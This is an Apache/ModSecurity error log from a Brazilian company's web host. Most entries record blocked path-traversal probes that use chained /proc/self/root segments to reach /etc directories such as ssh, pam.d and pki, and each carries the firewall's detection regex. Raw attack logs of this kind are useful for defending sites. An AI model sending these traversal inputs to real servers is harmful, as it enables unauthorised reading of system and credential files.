[Mon Mar 16 08:16:58.151622 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.241.46:33744] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmqo6lpbStxTqkSktRhAAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:16:58.626391 2026] [:error] [pid 10709:tid 140411590858496] [client 74.7.243.203:52250] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmqhXjF1vJNtV6CWreswAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:16:59.462848 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.241.46:57790] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmq9SswJuvopo3lOhE3AAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:17:00.823187 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.241.46:57792] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmrNSswJuvopo3lOhE3gAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:17:04.334239 2026] [:error] [pid 11972:tid 140411666392832] [client 74.7.241.46:57798] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmsJqj1wV0Si-OkefNMwAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:17:05.613808 2026] [mime_magic:error] [pid 21805:tid 140411632822016] (70014)End of file found: [client 74.7.241.46:57808] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/fs
[Mon Mar 16 08:17:06.135420 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.243.203:52252] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmstSswJuvopo3lOhE5AAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:17:08.555944 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.243.203:36538] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmtLysWC90G-1nBrAqHgAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:17:10.917844 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.243.203:36544] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmtrysWC90G-1nBrAqIAAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:17:12.395953 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.241.46:57816] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmuAlT9VtDQc7bgUyL6AAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:17:16.453217 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.243.203:45738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmvLABkC4fWIHEf8HPxAAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:17:20.077616 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.241.46:33416] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmv5qj1wV0Si-OkefNOgAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:17:22.483025 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.241.46:58132] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmwo6lpbStxTqkSktRhwAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:17:24.810497 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.241.46:58142] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmxP9ocpUE4ed4uDzSqQAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:17:26.179674 2026] [:error] [pid 10709:tid 140411708356352] [client 74.7.241.46:58144] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmxhXjF1vJNtV6CWretgAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:17:27.459161 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.241.46:58154] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmx9SswJuvopo3lOhE6AAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:17:31.939076 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.243.203:45742] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmy7ysWC90G-1nBrAqLgAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:17:33.211975 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.243.203:38538] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmzf9ocpUE4ed4uDzSqgAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:17:37.738923 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.243.203:38544] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm0Y6lpbStxTqkSktRjQAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:17:39.063247 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.243.203:38550] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm046lpbStxTqkSktRjgAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:17:40.403977 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.241.46:35210] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm1Jqj1wV0Si-OkefNSQAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:17:41.764347 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.241.46:40288] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm1dSswJuvopo3lOhE6gAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:17:43.362554 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.243.203:48548] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm13bQATo66fKoS7wuVQAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:17:44.167911 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.241.46:40302] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm2AlT9VtDQc7bgUyL8AAAAQE"], referer: 